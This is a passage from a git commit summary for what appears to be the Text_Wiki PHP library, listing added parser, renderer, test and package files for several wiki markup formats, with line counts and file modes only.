 Text/Wiki/Render/Latex/Bold.php                    |   28 +
 Text/Wiki/Render/Latex/Box.php                     |   54 +
 Text/Wiki/Render/Latex/Break.php                   |   24 +
 Text/Wiki/Render/Latex/Center.php                  |   33 +
 Text/Wiki/Render/Latex/Code.php                    |   26 +
 Text/Wiki/Render/Latex/Colortext.php               |   58 +
 Text/Wiki/Render/Latex/Deflist.php                 |   53 +
 Text/Wiki/Render/Latex/Delimiter.php               |   25 +
 Text/Wiki/Render/Latex/Embed.php                   |   23 +
 Text/Wiki/Render/Latex/Emphasis.php                |   29 +
 Text/Wiki/Render/Latex/Font.php                    |   73 +
 Text/Wiki/Render/Latex/Freelink.php                |    8 +
 Text/Wiki/Render/Latex/Function.php                |   23 +
 Text/Wiki/Render/Latex/Heading.php                 |   33 +
 Text/Wiki/Render/Latex/Horiz.php                   |   23 +
 Text/Wiki/Render/Latex/Html.php                    |   25 +
 Text/Wiki/Render/Latex/Image.php                   |   70 +
 Text/Wiki/Render/Latex/Include.php                 |    8 +
 Text/Wiki/Render/Latex/Interwiki.php               |   58 +
 Text/Wiki/Render/Latex/Italic.php                  |   28 +
 Text/Wiki/Render/Latex/List.php                    |   76 +
 Text/Wiki/Render/Latex/Newline.php                 |   12 +
 Text/Wiki/Render/Latex/Page.php                    |   48 +
 Text/Wiki/Render/Latex/Paragraph.php               |   31 +
 Text/Wiki/Render/Latex/Phplookup.php               |   34 +
 Text/Wiki/Render/Latex/Plugin.php                  |   49 +
 Text/Wiki/Render/Latex/Prefilter.php               |   24 +
 Text/Wiki/Render/Latex/Preformatted.php            |   48 +
 Text/Wiki/Render/Latex/Raw.php                     |   23 +
 Text/Wiki/Render/Latex/Revise.php                  |   38 +
 Text/Wiki/Render/Latex/Smiley.php                  |   44 +
 Text/Wiki/Render/Latex/Specialchar.php             |   54 +
 Text/Wiki/Render/Latex/Strong.php                  |   30 +
 Text/Wiki/Render/Latex/Subscript.php               |   54 +
 Text/Wiki/Render/Latex/Superscript.php             |   31 +
 Text/Wiki/Render/Latex/Table.php                   |   99 ++
 Text/Wiki/Render/Latex/Tighten.php                 |    9 +
 Text/Wiki/Render/Latex/Titlebar.php                |   54 +
 Text/Wiki/Render/Latex/Toc.php                     |   30 +
 Text/Wiki/Render/Latex/Tt.php                      |   30 +
 Text/Wiki/Render/Latex/Underline.php               |   30 +
 Text/Wiki/Render/Latex/Url.php                     |   41 +
 Text/Wiki/Render/Latex/Wikilink.php                |   63 +
 Text/Wiki/Render/Plain.php                         |   16 +
 Text/Wiki/Render/Plain/Anchor.php                  |   23 +
 Text/Wiki/Render/Plain/Blockquote.php              |   39 +
 Text/Wiki/Render/Plain/Bold.php                    |   23 +
 Text/Wiki/Render/Plain/Box.php                     |   48 +
 Text/Wiki/Render/Plain/Break.php                   |   24 +
 Text/Wiki/Render/Plain/Center.php                  |   23 +
 Text/Wiki/Render/Plain/Code.php                    |   24 +
 Text/Wiki/Render/Plain/Colortext.php               |   23 +
 Text/Wiki/Render/Plain/Deflist.php                 |   59 +
 Text/Wiki/Render/Plain/Delimiter.php               |   23 +
 Text/Wiki/Render/Plain/Embed.php                   |   23 +
 Text/Wiki/Render/Plain/Emphasis.php                |   23 +
 Text/Wiki/Render/Plain/Font.php                    |   44 +
 Text/Wiki/Render/Plain/Freelink.php                |   23 +
 Text/Wiki/Render/Plain/Function.php                |   39 +
 Text/Wiki/Render/Plain/Heading.php                 |   14 +
 Text/Wiki/Render/Plain/Horiz.php                   |   23 +
 Text/Wiki/Render/Plain/Html.php                    |   24 +
 Text/Wiki/Render/Plain/Image.php                   |   22 +
 Text/Wiki/Render/Plain/Include.php                 |    8 +
 Text/Wiki/Render/Plain/Interwiki.php               |   29 +
 Text/Wiki/Render/Plain/Italic.php                  |   23 +
 Text/Wiki/Render/Plain/List.php                    |   68 +
 Text/Wiki/Render/Plain/Newline.php                 |   12 +
 Text/Wiki/Render/Plain/Page.php                    |   48 +
 Text/Wiki/Render/Plain/Paragraph.php               |   31 +
 Text/Wiki/Render/Plain/Phplookup.php               |   25 +
 Text/Wiki/Render/Plain/Plugin.php                  |   49 +
 Text/Wiki/Render/Plain/Prefilter.php               |   24 +
 Text/Wiki/Render/Plain/Preformatted.php            |   48 +
 Text/Wiki/Render/Plain/Raw.php                     |   23 +
 Text/Wiki/Render/Plain/Revise.php                  |   24 +
 Text/Wiki/Render/Plain/Smiley.php                  |   44 +
 Text/Wiki/Render/Plain/Specialchar.php             |   54 +
 Text/Wiki/Render/Plain/Strong.php                  |   24 +
 Text/Wiki/Render/Plain/Subscript.php               |   48 +
 Text/Wiki/Render/Plain/Superscript.php             |   23 +
 Text/Wiki/Render/Plain/Table.php                   |   65 +
 Text/Wiki/Render/Plain/Tighten.php                 |   10 +
 Text/Wiki/Render/Plain/Titlebar.php                |   54 +
 Text/Wiki/Render/Plain/Toc.php                     |   39 +
 Text/Wiki/Render/Plain/Tt.php                      |   24 +
 Text/Wiki/Render/Plain/Underline.php               |   23 +
 Text/Wiki/Render/Plain/Url.php                     |   29 +
 Text/Wiki/Render/Plain/Wikilink.php                |   24 +
 Text/Wiki/Render/Tiki.php                          |   16 +
 Text/Wiki/Render/Tiki/Anchor.php                   |   29 +
 Text/Wiki/Render/Tiki/Blockquote.php               |   35 +
 Text/Wiki/Render/Tiki/Bold.php                     |   23 +
 Text/Wiki/Render/Tiki/Box.php                      |   29 +
 Text/Wiki/Render/Tiki/Break.php                    |   24 +
 Text/Wiki/Render/Tiki/Center.php                   |   29 +
 Text/Wiki/Render/Tiki/Code.php                     |   27 +
 Text/Wiki/Render/Tiki/Colortext.php                |   52 +
 Text/Wiki/Render/Tiki/Deflist.php                  |   68 +
 Text/Wiki/Render/Tiki/Delimiter.php                |   23 +
 Text/Wiki/Render/Tiki/Embed.php                    |   23 +
 Text/Wiki/Render/Tiki/Emphasis.php                 |   23 +
 Text/Wiki/Render/Tiki/Freelink.php                 |    9 +
 Text/Wiki/Render/Tiki/Function.php                 |   70 +
 Text/Wiki/Render/Tiki/Heading.php                  |   13 +
 Text/Wiki/Render/Tiki/Horiz.php                    |   23 +
 Text/Wiki/Render/Tiki/Html.php                     |   23 +
 Text/Wiki/Render/Tiki/Image.php                    |   42 +
 Text/Wiki/Render/Tiki/Include.php                  |    8 +
 Text/Wiki/Render/Tiki/Interwiki.php                |   23 +
 Text/Wiki/Render/Tiki/Italic.php                   |   23 +
 Text/Wiki/Render/Tiki/List.php                     |   51 +
 Text/Wiki/Render/Tiki/Newline.php                  |   12 +
 Text/Wiki/Render/Tiki/Paragraph.php                |   27 +
 Text/Wiki/Render/Tiki/Phplookup.php                |   25 +
 Text/Wiki/Render/Tiki/Prefilter.php                |   25 +
 Text/Wiki/Render/Tiki/Preformatted.php             |   48 +
 Text/Wiki/Render/Tiki/Raw.php                      |   23 +
 Text/Wiki/Render/Tiki/Redirect.php                 |   42 +
 Text/Wiki/Render/Tiki/Revise.php                   |   37 +
 Text/Wiki/Render/Tiki/Strong.php                   |   23 +
 Text/Wiki/Render/Tiki/Subscript.php                |   30 +
 Text/Wiki/Render/Tiki/Superscript.php              |   30 +
 Text/Wiki/Render/Tiki/Table.php                    |   71 +
 Text/Wiki/Render/Tiki/Tighten.php                  |   10 +
 Text/Wiki/Render/Tiki/Toc.php                      |   25 +
 Text/Wiki/Render/Tiki/Tt.php                       |   29 +
 Text/Wiki/Render/Tiki/Underline.php                |   23 +
 Text/Wiki/Render/Tiki/Url.php                      |   40 +
 Text/Wiki/Render/Tiki/Wikilink.php                 |   36 +
 Text/Wiki/Render/Xhtml.php                         |  107 ++
 Text/Wiki/Render/Xhtml/Address.php                 |   54 +
 Text/Wiki/Render/Xhtml/Anchor.php                  |   48 +
 Text/Wiki/Render/Xhtml/Blockquote.php              |   72 +
 Text/Wiki/Render/Xhtml/Bold.php                    |   57 +
 Text/Wiki/Render/Xhtml/Box.php                     |   62 +
 Text/Wiki/Render/Xhtml/Break.php                   |   52 +
 Text/Wiki/Render/Xhtml/Center.php                  |   62 +
 Text/Wiki/Render/Xhtml/Code.php                    |  133 ++
 Text/Wiki/Render/Xhtml/Colortext.php               |   79 +
 Text/Wiki/Render/Xhtml/Deflist.php                 |   87 ++
 Text/Wiki/Render/Xhtml/Delimiter.php               |   46 +
 Text/Wiki/Render/Xhtml/Embed.php                   |   46 +
 Text/Wiki/Render/Xhtml/Emphasis.php                |   58 +
 Text/Wiki/Render/Xhtml/Font.php                    |   83 ++
 Text/Wiki/Render/Xhtml/Freelink.php                |   35 +
 Text/Wiki/Render/Xhtml/Function.php                |  108 ++
 Text/Wiki/Render/Xhtml/Heading.php                 |   88 ++
 Text/Wiki/Render/Xhtml/Horiz.php                   |   51 +
 Text/Wiki/Render/Xhtml/Html.php                    |   47 +
 Text/Wiki/Render/Xhtml/Image.php                   |  184 +++
 Text/Wiki/Render/Xhtml/Include.php                 |   32 +
 Text/Wiki/Render/Xhtml/Interwiki.php               |  103 ++
 Text/Wiki/Render/Xhtml/Italic.php                  |   57 +
 Text/Wiki/Render/Xhtml/List.php                    |  172 +++
 Text/Wiki/Render/Xhtml/Newline.php                 |   35 +
 Text/Wiki/Render/Xhtml/Page.php                    |   46 +
 Text/Wiki/Render/Xhtml/Paragraph.php               |   59 +
 Text/Wiki/Render/Xhtml/Phplookup.php               |   81 ++
 Text/Wiki/Render/Xhtml/Plugin.php                  |   47 +
 Text/Wiki/Render/Xhtml/Prefilter.php               |   34 +
 Text/Wiki/Render/Xhtml/Preformatted.php            |   47 +
 Text/Wiki/Render/Xhtml/Raw.php                     |   46 +
 Text/Wiki/Render/Xhtml/Revise.php                  |   68 +
 Text/Wiki/Render/Xhtml/Smiley.php                  |   74 +
 Text/Wiki/Render/Xhtml/Specialchar.php             |   52 +
 Text/Wiki/Render/Xhtml/Strong.php                  |   58 +
 Text/Wiki/Render/Xhtml/Subscript.php               |   57 +
 Text/Wiki/Render/Xhtml/Superscript.php             |   57 +
 Text/Wiki/Render/Xhtml/Table.php                   |  140 ++
 Text/Wiki/Render/Xhtml/Tighten.php                 |   34 +
 Text/Wiki/Render/Xhtml/Titlebar.php                |   57 +
 Text/Wiki/Render/Xhtml/Toc.php                     |  116 ++
 Text/Wiki/Render/Xhtml/Tt.php                      |   58 +
 Text/Wiki/Render/Xhtml/Underline.php               |   57 +
 Text/Wiki/Render/Xhtml/Url.php                     |  131 ++
 Text/Wiki/Render/Xhtml/Wikilink.php                |  177 +++
 Text/Wiki/Tiki.php                                 |   92 ++
 composer.json                                      |   41 +
 doc/BBCodeParser.php                               |  427 ++++++
 doc/BBCodeParser_V2.ini                            |  160 ++
 doc/BBtest.txt                                     |  103 ++
 doc/README_BBCodeParser                            |   45 +
 doc/parser.php                                     |  121 ++
 doc/test_Text_Wiki.php                             |  184 +++
 package.xml                                        |  526 +++++++
 packageBBCode.xml                                  |  146 ++
 packageCowiki.xml                                  |  144 ++
 packageCreole.xml                                  |  132 ++
 packageDoku.xml                                    |  140 ++
 packageMediawiki.xml                               |  160 ++
 packageTiki.xml                                    |  178 +++
 tests/AllTests.php                                 |   41 +
 tests/BBCode/7908.phpt                             |  243 ++++
 tests/Cowiki_Render_Url.phpt                       |   18 +
 tests/Creole_Parse_Url.phpt                        |   70 +
 tests/Creole_Render_Url.phpt                       |   18 +
 tests/Default_Parse_BlockQuote.phpt                |   72 +
 tests/Docbook_Render_Url.phpt                      |   14 +
 tests/Doku_Render_Url.phpt                         |   18 +
 tests/Latex_Render_Url.phpt                        |   20 +
 tests/Plain_Render_Url.phpt                        |   15 +
 tests/Text_Wiki_BugTests.php                       |   56 +
 tests/Text_Wiki_Generic_Transform_Tests.php        |   36 +
 tests/Text_Wiki_Parse_Mediawiki_Tests.php          |  765 ++++++++++
 tests/Text_Wiki_Parse_Tiki_Tests.php               |  127 ++
 tests/Text_Wiki_Render_Tests.php                   |   98 ++
 tests/Text_Wiki_Render_Tiki_Tests.php              |  728 +++++++++
 tests/Text_Wiki_Tests.php                          |  505 +++++++
 tests/Xhtml_Render_Url.phpt                        |   15 +
 tests/fixtures/bug11649.txt                        |  521 +++++++
 tests/fixtures/mediawiki_syntax.txt                |  123 ++
 .../mediawiki_syntax_to_test_preformatted.txt      |   10 +
 tests/fixtures/mediawiki_syntax_to_test_raw.txt    |    9 +
 .../fixtures/mediawiki_syntax_to_test_wikilink.txt |   88 ++
 .../test_mediawiki_to_tiki_lists_output.txt        |   17 +
 .../test_mediawiki_to_tiki_lists_source.txt        |   18 +
 tests/fixtures/test_mediawiki_to_tiki_output.txt   |   52 +
 .../test_mediawiki_to_tiki_redirect_output.txt     |    3 +
 .../test_mediawiki_to_tiki_redirect_source.txt     |    2 +
 tests/fixtures/test_mediawiki_to_tiki_source.txt   |   58 +
 .../test_mediawiki_wikilink_expected_matches.php   |   70 +
 .../test_tiki_heading_expected_matches.php         |   60 +
 .../fixtures/test_tiki_to_tiki_heading_source.txt  |   11 +
 .../fixtures/text_wiki_sample_mediawiki_syntax.txt |   66 +
 ...ext_wiki_sample_syntax_transformed_to_plain.txt |   64 +
 ...xt_wiki_sample_syntax_transformed_to_plain2.txt |   64 +
 ...ext_wiki_sample_syntax_transformed_to_xhtml.txt |   70 +
 tests/fixtures/tiki_syntax.txt                     |   23 +
 621 files changed, 47131 insertions(+)
 create mode 100644 .gitignore
 create mode 100644 .travis.yml
 create mode 100644 Text/Wiki.php
 create mode 100644 Text/Wiki/BBCode.php
 create mode 100644 Text/Wiki/Cowiki.php
 create mode 100644 Text/Wiki/Creole.php
 create mode 100644 Text/Wiki/Default.php
 create mode 100644 Text/Wiki/Doku.php
 create mode 100644 Text/Wiki/Mediawiki.php
 create mode 100644 Text/Wiki/Parse.php
 create mode 100644 Text/Wiki/Parse/BBCode/Blockquote.php
 create mode 100644 Text/Wiki/Parse/BBCode/Bold.php
 create mode 100644 Text/Wiki/Parse/BBCode/Code.php
 create mode 100755 Text/Wiki/Parse/BBCode/Colortext.php
 create mode 100644 Text/Wiki/Parse/BBCode/Font.php
 create mode 100644 Text/Wiki/Parse/BBCode/Image.php
 create mode 100644 Text/Wiki/Parse/BBCode/Italic.php
 create mode 100644 Text/Wiki/Parse/BBCode/List.php
 create mode 100644 Text/Wiki/Parse/BBCode/Subscript.php
 create mode 100644 Text/Wiki/Parse/BBCode/Superscript.php
 create mode 100644 Text/Wiki/Parse/BBCode/Underline.php
 create mode 100644 Text/Wiki/Parse/BBCode/Url.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Anchor.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Blockquote.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Bold.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Break.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Center.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Code.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Colortext.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Deflist.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Delimiter.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Embed.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Emphasis.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Freelink.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Function.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Heading.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Horiz.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Html.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Image.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Include.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Interwiki.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Italic.php
 create mode 100644 Text/Wiki/Parse/Cowiki/List.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Newline.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Paragraph.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Phplookup.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Prefilter.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Raw.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Revise.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Strong.php
 create mode 100755 Text/Wiki/Parse/Cowiki/Subscript.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Superscript.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Table.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Tighten.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Toc.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Tt.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Underline.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Url.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Wikilink.php
 create mode 100644 Text/Wiki/Parse/Creole/Address.php
 create mode 100644 Text/Wiki/Parse/Creole/Blockquote.php
 create mode 100644 Text/Wiki/Parse/Creole/Bold.php
 create mode 100644 Text/Wiki/Parse/Creole/Box.php
 create mode 100644 Text/Wiki/Parse/Creole/Break.php
 create mode 100644 Text/Wiki/Parse/Creole/Center.php
 create mode 100644 Text/Wiki/Parse/Creole/Deflist.php
 create mode 100644 Text/Wiki/Parse/Creole/Delimiter.php
 create mode 100644 Text/Wiki/Parse/Creole/Emphasis.php
 create mode 100644 Text/Wiki/Parse/Creole/Footnote.php
 create mode 100644 Text/Wiki/Parse/Creole/Heading.php
 create mode 100644 Text/Wiki/Parse/Creole/Horiz.php
 create mode 100644 Text/Wiki/Parse/Creole/Image.php
 create mode 100644 Text/Wiki/Parse/Creole/Italic.php
 create mode 100644 Text/Wiki/Parse/Creole/List.php
 create mode 100644 Text/Wiki/Parse/Creole/Newline.php
 create mode 100644 Text/Wiki/Parse/Creole/Paragraph.php
 create mode 100644 Text/Wiki/Parse/Creole/Prefilter.php
 create mode 100644 Text/Wiki/Parse/Creole/Preformatted.php
 create mode 100644 Text/Wiki/Parse/Creole/Raw.php
 create mode 100644 Text/Wiki/Parse/Creole/Strong.php
 create mode 100644 Text/Wiki/Parse/Creole/Subscript.php
 create mode 100644 Text/Wiki/Parse/Creole/Superscript.php
 create mode 100644 Text/Wiki/Parse/Creole/Table.php
 create mode 100644 Text/Wiki/Parse/Creole/Tighten.php
 create mode 100644 Text/Wiki/Parse/Creole/Trim.php
 create mode 100644 Text/Wiki/Parse/Creole/Tt.php
 create mode 100644 Text/Wiki/Parse/Creole/Underline.php
 create mode 100644 Text/Wiki/Parse/Creole/Url.php
 create mode 100644 Text/Wiki/Parse/Creole/Wikilink.php
 create mode 100644 Text/Wiki/Parse/Default/Anchor.php
 create mode 100644 Text/Wiki/Parse/Default/Blockquote.php
 create mode 100644 Text/Wiki/Parse/Default/Bold.php
 create mode 100644 Text/Wiki/Parse/Default/Break.php
 create mode 100644 Text/Wiki/Parse/Default/Center.php
 create mode 100644 Text/Wiki/Parse/Default/Code.php
 create mode 100644 Text/Wiki/Parse/Default/Colortext.php
 create mode 100644 Text/Wiki/Parse/Default/Deflist.php
 create mode 100644 Text/Wiki/Parse/Default/Delimiter.php
 create mode 100644 Text/Wiki/Parse/Default/Embed.php
 create mode 100644 Text/Wiki/Parse/Default/Emphasis.php
 create mode 100644 Text/Wiki/Parse/Default/Freelink.php
 create mode 100644 Text/Wiki/Parse/Default/Function.php
 create mode 100644 Text/Wiki/Parse/Default/Heading.php
 create mode 100644 Text/Wiki/Parse/Default/Horiz.php
 create mode 100644 Text/Wiki/Parse/Default/Html.php
 create mode 100644 Text/Wiki/Parse/Default/Image.php
 create mode 100644 Text/Wiki/Parse/Default/Include.php
 create mode 100644 Text/Wiki/Parse/Default/Interwiki.php
 create mode 100644 Text/Wiki/Parse/Default/Italic.php
 create mode 100644 Text/Wiki/Parse/Default/List.php
 create mode 100644 Text/Wiki/Parse/Default/Newline.php
 create mode 100644 Text/Wiki/Parse/Default/Paragraph.php
 create mode 100644 Text/Wiki/Parse/Default/Phplookup.php
 create mode 100644 Text/Wiki/Parse/Default/Prefilter.php
 create mode 100644 Text/Wiki/Parse/Default/Raw.php
 create mode 100644 Text/Wiki/Parse/Default/Revise.php
 create mode 100644 Text/Wiki/Parse/Default/Smiley.php
 create mode 100644 Text/Wiki/Parse/Default/Strong.php
 create mode 100644 Text/Wiki/Parse/Default/Subscript.php
 create mode 100644 Text/Wiki/Parse/Default/Superscript.php
 create mode 100644 Text/Wiki/Parse/Default/Table.php
 create mode 100644 Text/Wiki/Parse/Default/Tighten.php
 create mode 100644 Text/Wiki/Parse/Default/Toc.php
 create mode 100644 Text/Wiki/Parse/Default/Tt.php
 create mode 100644 Text/Wiki/Parse/Default/Underline.php
 create mode 100644 Text/Wiki/Parse/Default/Url.php
 create mode 100644 Text/Wiki/Parse/Default/Wikilink.php
 create mode 100644 Text/Wiki/Parse/Doku/Anchor.php
 create mode 100644 Text/Wiki/Parse/Doku/Blockquote.php
 create mode 100644 Text/Wiki/Parse/Doku/Bold.php
 create mode 100644 Text/Wiki/Parse/Doku/Break.php
 create mode 100644 Text/Wiki/Parse/Doku/Center.php
 create mode 100644 Text/Wiki/Parse/Doku/Code.php
 create mode 100644 Text/Wiki/Parse/Doku/Colortext.php
 create mode 100644 Text/Wiki/Parse/Doku/Deflist.php
 create mode 100644 Text/Wiki/Parse/Doku/Delimiter.php
 create mode 100644 Text/Wiki/Parse/Doku/Embed.php
 create mode 100644 Text/Wiki/Parse/Doku/Emphasis.php
 create mode 100644 Text/Wiki/Parse/Doku/Freelink.php
 create mode 100644 Text/Wiki/Parse/Doku/Function.php
 create mode 100644 Text/Wiki/Parse/Doku/Heading.php
 create mode 100644 Text/Wiki/Parse/Doku/Horiz.php
 create mode 100644 Text/Wiki/Parse/Doku/Html.php
 create mode 100644 Text/Wiki/Parse/Doku/Image.php
 create mode 100644 Text/Wiki/Parse/Doku/Include.php
 create mode 100644 Text/Wiki/Parse/Doku/Interwiki.php
 create mode 100644 Text/Wiki/Parse/Doku/Italic.php
 create mode 100644 Text/Wiki/Parse/Doku/List.php
 create mode 100644 Text/Wiki/Parse/Doku/Newline.php
 create mode 100644 Text/Wiki/Parse/Doku/Paragraph.php
 create mode 100644 Text/Wiki/Parse/Doku/Phplookup.php
 create mode 100644 Text/Wiki/Parse/Doku/Prefilter.php
 create mode 100644 Text/Wiki/Parse/Doku/Raw.php
 create mode 100644 Text/Wiki/Parse/Doku/Revise.php
 create mode 100644 Text/Wiki/Parse/Doku/Strong.php
 create mode 100755 Text/Wiki/Parse/Doku/Subscript.php
 create mode 100644 Text/Wiki/Parse/Doku/Superscript.php
 create mode 100644 Text/Wiki/Parse/Doku/Table.php
 create mode 100644 Text/Wiki/Parse/Doku/Tighten.php
 create mode 100644 Text/Wiki/Parse/Doku/Toc.php
 create mode 100644 Text/Wiki/Parse/Doku/Tt.php
 create mode 100644 Text/Wiki/Parse/Doku/Underline.php
 create mode 100644 Text/Wiki/Parse/Doku/Url.php
 create mode 100644 Text/Wiki/Parse/Doku/Wikilink.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/Break.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/Code.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/Comment.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/Deflist.php
 create mode 100644 Text/Wiki/Parse/Mediawiki/Emphasis.php
 create mode 100644 Text/Wiki/Parse/Mediawiki/Heading.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/List.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/Newline.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/Preformatted.php
 create mode 100644 Text/Wiki/Parse/Mediawiki/Raw.php
 create mode 100644 Text/Wiki/Parse/Mediawiki/Redirect.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/Subscript.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/Superscript.php
 create mode 100644 Text/Wiki/Parse/Mediawiki/Table.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/Tt.php
 create mode 100644 Text/Wiki/Parse/Mediawiki/Url.php
 create mode 100644 Text/Wiki/Parse/Mediawiki/Wikilink.php
 create mode 100755 Text/Wiki/Parse/Tiki/Anchor.php
 create mode 100755 Text/Wiki/Parse/Tiki/Blockquote.php
 create mode 100755 Text/Wiki/Parse/Tiki/Bold.php
 create mode 100755 Text/Wiki/Parse/Tiki/Box.php
 create mode 100755 Text/Wiki/Parse/Tiki/Break.php
 create mode 100755 Text/Wiki/Parse/Tiki/Center.php
 create mode 100755 Text/Wiki/Parse/Tiki/Code.php
 create mode 100755 Text/Wiki/Parse/Tiki/Colortext.php
 create mode 100755 Text/Wiki/Parse/Tiki/Deflist.php
 create mode 100755 Text/Wiki/Parse/Tiki/Delimiter.php
 create mode 100755 Text/Wiki/Parse/Tiki/Embed.php
 create mode 100755 Text/Wiki/Parse/Tiki/Emphasis.php
 create mode 100755 Text/Wiki/Parse/Tiki/Freelink.php
 create mode 100755 Text/Wiki/Parse/Tiki/Heading.php
 create mode 100755 Text/Wiki/Parse/Tiki/Horiz.php
 create mode 100755 Text/Wiki/Parse/Tiki/Html.php
 create mode 100755 Text/Wiki/Parse/Tiki/Image.php
 create mode 100755 Text/Wiki/Parse/Tiki/Include.php
 create mode 100755 Text/Wiki/Parse/Tiki/Interwiki.php
 create mode 100755 Text/Wiki/Parse/Tiki/Italic.php
 create mode 100755 Text/Wiki/Parse/Tiki/List.php
 create mode 100755 Text/Wiki/Parse/Tiki/Newline.php
 create mode 100644 Text/Wiki/Parse/Tiki/Page.php
 create mode 100755 Text/Wiki/Parse/Tiki/Paragraph.php
 create mode 100644 Text/Wiki/Parse/Tiki/Plugin.php
 create mode 100755 Text/Wiki/Parse/Tiki/Prefilter.php
 create mode 100755 Text/Wiki/Parse/Tiki/Preformatted.php
 create mode 100755 Text/Wiki/Parse/Tiki/Raw.php
 create mode 100755 Text/Wiki/Parse/Tiki/Revise.php
 create mode 100644 Text/Wiki/Parse/Tiki/Smiley.php
 create mode 100644 Text/Wiki/Parse/Tiki/Specialchar.php
 create mode 100755 Text/Wiki/Parse/Tiki/Strong.php
 create mode 100755 Text/Wiki/Parse/Tiki/Subscript.php
 create mode 100755 Text/Wiki/Parse/Tiki/Superscript.php
 create mode 100755 Text/Wiki/Parse/Tiki/Table.php
 create mode 100755 Text/Wiki/Parse/Tiki/Tighten.php
 create mode 100644 Text/Wiki/Parse/Tiki/Titlebar.php
 create mode 100755 Text/Wiki/Parse/Tiki/Toc.php
 create mode 100755 Text/Wiki/Parse/Tiki/Tt.php
 create mode 100755 Text/Wiki/Parse/Tiki/Underline.php
 create mode 100755 Text/Wiki/Parse/Tiki/Url.php
 create mode 100755 Text/Wiki/Parse/Tiki/Wikilink.php
 create mode 100644 Text/Wiki/Render.php
 create mode 100644 Text/Wiki/Render/Cowiki.php
 create mode 100644 Text/Wiki/Render/Cowiki/Anchor.php
 create mode 100644 Text/Wiki/Render/Cowiki/Blockquote.php
 create mode 100644 Text/Wiki/Render/Cowiki/Bold.php
 create mode 100644 Text/Wiki/Render/Cowiki/Box.php
 create mode 100644 Text/Wiki/Render/Cowiki/Break.php
 create mode 100644 Text/Wiki/Render/Cowiki/Center.php
 create mode 100644 Text/Wiki/Render/Cowiki/Code.php
 create mode 100644 Text/Wiki/Render/Cowiki/Colortext.php
 create mode 100644 Text/Wiki/Render/Cowiki/Deflist.php
 create mode 100644 Text/Wiki/Render/Cowiki/Delimiter.php
 create mode 100644 Text/Wiki/Render/Cowiki/Embed.php
 create mode 100644 Text/Wiki/Render/Cowiki/Emphasis.php
 create mode 100644 Text/Wiki/Render/Cowiki/Freelink.php
 create mode 100644 Text/Wiki/Render/Cowiki/Function.php
 create mode 100644 Text/Wiki/Render/Cowiki/Heading.php
 create mode 100644 Text/Wiki/Render/Cowiki/Horiz.php
 create mode 100644 Text/Wiki/Render/Cowiki/Html.php
 create mode 100644 Text/Wiki/Render/Cowiki/Image.php
 create mode 100644 Text/Wiki/Render/Cowiki/Include.php
 create mode 100644 Text/Wiki/Render/Cowiki/Interwiki.php
 create mode 100644 Text/Wiki/Render/Cowiki/Italic.php
 create mode 100644 Text/Wiki/Render/Cowiki/List.php
 create mode 100644 Text/Wiki/Render/Cowiki/Newline.php
 create mode 100644 Text/Wiki/Render/Cowiki/Paragraph.php
 create mode 100644 Text/Wiki/Render/Cowiki/Phplookup.php
 create mode 100644 Text/Wiki/Render/Cowiki/Prefilter.php
 create mode 100644 Text/Wiki/Render/Cowiki/Raw.php
 create mode 100644 Text/Wiki/Render/Cowiki/Revise.php
 create mode 100644 Text/Wiki/Render/Cowiki/Strong.php
 create mode 100755 Text/Wiki/Render/Cowiki/Subscript.php
 create mode 100644 Text/Wiki/Render/Cowiki/Superscript.php
 create mode 100644 Text/Wiki/Render/Cowiki/Table.php
 create mode 100644 Text/Wiki/Render/Cowiki/Tighten.php
 create mode 100644 Text/Wiki/Render/Cowiki/Toc.php
 create mode 100644 Text/Wiki/Render/Cowiki/Tt.php
 create mode 100644 Text/Wiki/Render/Cowiki/Underline.php
 create mode 100644 Text/Wiki/Render/Cowiki/Url.php
 create mode 100644 Text/Wiki/Render/Cowiki/Wikilink.php
 create mode 100644 Text/Wiki/Render/Creole.php
 create mode 100644 Text/Wiki/Render/Creole/Address.php
 create mode 100644 Text/Wiki/Render/Creole/Anchor.php
 create mode 100644 Text/Wiki/Render/Creole/Blockquote.php
 create mode 100644 Text/Wiki/Render/Creole/Bold.php
 create mode 100644 Text/Wiki/Render/Creole/Box.php
 create mode 100644 Text/Wiki/Render/Creole/Break.php
 create mode 100644 Text/Wiki/Render/Creole/Center.php
